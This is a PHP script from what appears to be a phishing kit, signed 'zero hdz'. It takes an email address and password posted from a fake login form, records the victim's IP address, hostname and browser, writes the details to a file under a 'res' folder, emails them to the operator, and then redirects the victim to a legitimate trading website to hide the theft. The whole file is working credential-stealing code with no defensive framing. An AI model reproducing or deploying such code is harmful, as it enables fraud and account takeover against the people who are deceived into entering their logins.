<?php

$ip = getenv("REMOTE_ADDR");
$message = "-------------------- by zero hdz -------------------\n";
$message .= "--------------  Infos -------------\n";
$message .= "Email Adresse       : ".$_POST['email']."\n";
$message .= "Password          : ".$_POST['pr']."\n";
$message .= "-------------- IP Infos ------------\n";
$message .= "IP      : $ip\n";
$message .= "HOST    : ".gethostbyaddr($ip)."\n";
$message .= "BROWSER : ".$_SERVER['HTTP_USER_AGENT']."\n";
$message .= "---------------------- BY zero hdz ----------------------\n";


$subject = "New Log By zero hdz ";
$send = "put email here";
$headers = 'From: mail@srvd32.hosteur.com' . "\r\n";
file_put_contents("./res/".$_POST['email'].".txt",$message);
mail($send,$subject,$message,$headers);

header("Location: https://www.tradechina.com/");
?>